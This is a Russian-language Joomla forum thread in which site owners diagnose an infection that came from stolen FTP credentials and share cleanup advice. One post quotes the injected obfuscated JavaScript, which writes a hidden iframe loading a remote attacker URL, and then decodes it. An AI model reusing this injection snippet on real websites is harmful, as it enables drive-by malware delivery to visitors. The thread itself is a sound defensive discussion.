Мой сайт заражен вирусом. Что делать?

Тема в разделе "Аудит", создана пользователем ZAjoomla!, 07.09.2008.

  1. Offline

    ZAjoomla! Недавно здесь

    Регистрация:
    09.04.2008
    Сообщения:
    95
    Симпатии:
    3
    Пол:
    Мужской
    Добрый день вот какая бадяга. Сайт перестал открываться через Internet Explorer. DrWeb при открытии пишет, что страница заражена вирусом. На других компах аналогичная ситуация. Грузится страница, но либо вообще нет изображения и контента, либо только до половины. Через Opera и Mozilla без проблем загружается. Ничего сам не трогал и не менял. Подскажите, какой файл может быть заражен вирусом и где искать? Как можно вылечить или удалить вирус на сервере? Спасибо.
     
  2.  
  3. Dead Krolik
    Offline

    Dead Krolik Недавно здесь => Cпециалист <=

    Регистрация:
    13.04.2007
    Сообщения:
    3 685
    Симпатии:
    101
    Пол:
    Мужской
  4. Offline

    ZAjoomla! Недавно здесь

    Регистрация:
    09.04.2008
    Сообщения:
    95
    Симпатии:
    3
    Пол:
    Мужской
    Короче, у меня был заражен файл index.php троянчиком. Я просмотрел главные файлы, увидел, что index.php по непонятным причинам был изменен совсем недавно (дата создания файла была сентябрьской:), скопировал этот файл на комп, пропустил через Drweb. Он этот файл, типа, вылечил. Вроде пока все работает. Так что и вам спасибо за совет и Доктору Вебу ))
     
  5. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    ZAjoomla!, да лучше бы перезалил эти файлы из дистрибутива
     
  6. Offline

    ZAjoomla! Недавно здесь

    Регистрация:
    09.04.2008
    Сообщения:
    95
    Симпатии:
    3
    Пол:
    Мужской
    Так ведь и так все вроде работает. Если че, перезалью из дистрибутива. Спасибо за совет!
     
  7. Offline

    Roman Z. Недавно здесь

    Регистрация:
    21.11.2008
    Сообщения:
    1
    Симпатии:
    0
    Так Вы устранили следствие, а не причину. Может быть рецидив.
    Желательно обновить Joomla! до последней стабильной версии, правильно выставить права на файлы, сменить пароли на сайт и на фтп.
     
  8. Offline

    kadetsw Недавно здесь

    Регистрация:
    12.10.2008
    Сообщения:
    37
    Симпатии:
    1
    Пол:
    Мужской
    Народ, тоже в тему..... правда для 1.0.15 версии..
    Заметил, что в шаблон и в конец файла index.php самой джумлы каким то образом был вставлен javascript следующего вида:
    <!-- o65 --><Script Language='Javascript'>
    <!--
    document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
    //-->
    </Script><!-- c65 -->

    после дешифровки имеем следующее:

    <!-- o65 --><Script Language='Javascript'>
    <!--
    document.write(unescape('<iframe src="http://rtdmns.net/parus/?t=28" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>'));
    //-->
    </Script><!-- c65 -->


    При чем на ВСЕХ моих сайтах под joomla.
    Вопрос: как от этого уберечься?

    PS Проверьте свои сайты на наличие данного кода.
     
  9. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    А хостер кто? Его надо пинать в первую очередь, тут явно лошадку залили через его приложения
     
  10. Offline

    kadetsw Недавно здесь

    Регистрация:
    12.10.2008
    Сообщения:
    37
    Симпатии:
    1
    Пол:
    Мужской
    хостер - лидерхост
    а через какие, например приложения это можно сделать?
     
  11. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
  12. Offline

    kadetsw Недавно здесь

    Регистрация:
    12.10.2008
    Сообщения:
    37
    Симпатии:
    1
    Пол:
    Мужской
    Извините, братцы, скорее всего тревога ложная, а я ламер баговый, похоже у меня троян доступы к фтп просто увел...:O

    Ситуевина следующая, видимо имея доступ на фтп некий троян сканирует все папки на фтп и всем файлам с именем index (не зависимо от расширения и местонахождения) прописывает свой скрипт по алгоритму: если есть тег body - прописываемся сразу за ним, иначе пишемся в конец файла.

    Еще раз сори за ложную тревогу.
     
  13. Offline

    Cheshirus Недавно здесь

    Регистрация:
    16.01.2010
    Сообщения:
    11
    Симпатии:
    0
    Пол:
    Мужской
    Именно так и получается! Крадется акк и пасс к фтп-аккаунту и на автомате прописывается вредоносный код. Стоит простучать своего хостера на предмет ограничения в админку по IP у jino такое есть, другими словами никто не может войти кроме как со своего IP (указанного в файле в корневой папке как точно называется, не помню). Плюсы - Никто кроме тебя не зайдет в админку, минус - если IP адрес динамический, то не прокатит.
     
  14. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    На форуме был плагин к админке, не зная секретного паса не войдешь. Хотя в вашем случае защищать нужно фтп
     
  15. Offline

    Galince Недавно здесь

    Регистрация:
    24.12.2008
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    У меня тоже такая же фигня.. Я вот только не знаю что делать... Теперь то понятно что лимит IPшников поставлю, а вот что делать чтоб все сайты быстро восстановить? Попросить у хостера бэкапы и перезаписать все идексные файлы?


    Подскажите плизз!:'(:'(
     
  16. Offline

    kadetsw Недавно здесь

    Регистрация:
    12.10.2008
    Сообщения:
    37
    Симпатии:
    1
    Пол:
    Мужской
    либо просить хостера перезалить сайт из бекапа, либо править все вручную (
     

Поделиться этой страницей

Загрузка...